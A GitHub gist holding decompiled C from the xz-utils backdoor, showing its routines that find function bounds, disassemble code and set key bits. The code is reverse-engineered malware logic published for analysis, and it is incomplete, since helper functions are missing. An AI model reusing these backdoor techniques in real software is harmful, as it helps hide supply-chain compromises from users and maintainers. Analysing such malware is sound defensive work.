Skip to content

Instantly share code, notes, and snippets.

@mkow

mkow/backdoor_decomp.c

Last active March 31, 2024 14:05
Show Gist options
  • Save mkow/8515456685c3a4bb1d64c9d193e779d5 to your computer and use it in GitHub Desktop.
Save mkow/8515456685c3a4bb1d64c9d193e779d5 to your computer and use it in GitHub Desktop.
Download ZIP
xz decompiled backdoor key setting
Raw
backdoor_decomp.c
// +0xABC0 (in .o)
bool ensure_calling_only_once_and_set_key_bit(
unsigned __int64 addr_to_disasm_if_valid,
unsigned int key_bit_ind,
unsigned int a3,
unsigned int ket_init_unique_id)
{
char *addr; // rax
char *retaddr; // [rsp+0h] [rbp+0h]
addr = (char *)addr_to_disasm_if_valid;
if ( addr_to_disasm_if_valid <= 1 )
addr = retaddr; // use the caller retaddr instead of the arg
return (int)scan_code_and_set_key_bit(addr_to_disasm_if_valid, addr, key_bit_ind, a3, ket_init_unique_id) > 0;
}
// +0xAAF0 (in .o)
__int64 scan_code_and_set_key_bit(
__int64 a1,
char *code_start,
unsigned int key_bit_ind,
unsigned int a4,
unsigned int key_init_unique_id)
{
global_state *v5; // rax
unsigned __int8 *func_start; // [rsp+8h] [rbp-30h] OVERLAPPED BYREF
func_start = 0;
v5 = global_state;
if ( global_state && !global_state->was_key_init_called[key_init_unique_id] )
{
global_state->was_key_init_called[key_init_unique_id] = 1;
if ( !find_function_bounds(code_start, &func_start, 0, (char *)v5->field_80, v5->field_88, 1)
|| !disasm_and_set_key_bit(func_start, global_state->field_88, key_bit_ind, a4, a1 == 0) )
{
return 0;
}
global_state->field_160 += a4;
}
return 1;
}
// +0x0B90 (in .o)
unsigned int find_function_bounds(
char *start,
unsigned __int8 **out_function_start,
unsigned __int8 **out_function_end,
char *backward_limit,
unsigned __int8 *forward_limit,
int endbr64_check)
{
char *i; // r15
unsigned __int8 *v10; // r15
char *fwd_i; // rbx
unsigned __int8 *v13; // r14
__int64 v15[8]; // [rsp+18h] [rbp-40h] BYREF
v15[0] = 0;
if ( out_function_start )
{
for ( i = start; backward_limit < i && !(unsigned int)is_func_start(i, forward_limit, (char **)v15, endbr64_check); --i )
;
v10 = (unsigned __int8 *)v15[0];
if ( !v15[0]
|| (char *)v15[0] == backward_limit
&& !(unsigned int)is_func_start(backward_limit, forward_limit, 0, endbr64_check) )
{
return 0;
}
*out_function_start = v10;
}
fwd_i = start + 1;
v13 = forward_limit - 4;
if ( out_function_end )
{
while ( fwd_i < (char *)v13 )
{
if ( (unsigned int)is_func_start(fwd_i, forward_limit, 0, endbr64_check) )
goto LABEL_19;
++fwd_i;
}
if ( v13 != (unsigned __int8 *)fwd_i || (unsigned int)is_func_start(fwd_i, forward_limit, 0, endbr64_check) )
LABEL_19:
forward_limit = (unsigned __int8 *)fwd_i;
*out_function_end = forward_limit;
}
return 1;
}
// +0xAA30 (in .o)
bool disasm_and_set_key_bit(
unsigned __int8 *start,
unsigned __int8 *end,
unsigned int key_bit_ind,
unsigned int insn_cnt,
int a5)
{
unsigned __int64 insn_i; // r12
unsigned int i_ptr; // [rsp+Ch] [rbp-9Ch] OVERLAPPED BYREF
disasm_res disasm; // [rsp+18h] [rbp-90h] BYREF
v7 = 22LL;
memset(&disasm, 0, sizeof(disasm));
i_ptr = key_bit_ind;
if ( a5 )
{
if ( !(unsigned int)sub_C80(start, end, 0, &disasm) )
return 0;
start = &disasm.insn_start[disasm.insn_size];
}
insn_i = 0;
while ( (unsigned int)sub_AC70(start, end, &disasm) )
{
if ( insn_i == insn_cnt )
{
if ( insn_cnt < (unsigned int)insn_i )
return 0;
return insn_cnt == (_DWORD)insn_i;
}
++insn_i;
if ( !set_nth_bit_if_smth(&disasm, &i_ptr) )
return 0;
start = &disasm.insn_start[disasm.insn_size];
}
return insn_cnt == (_DWORD)insn_i;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment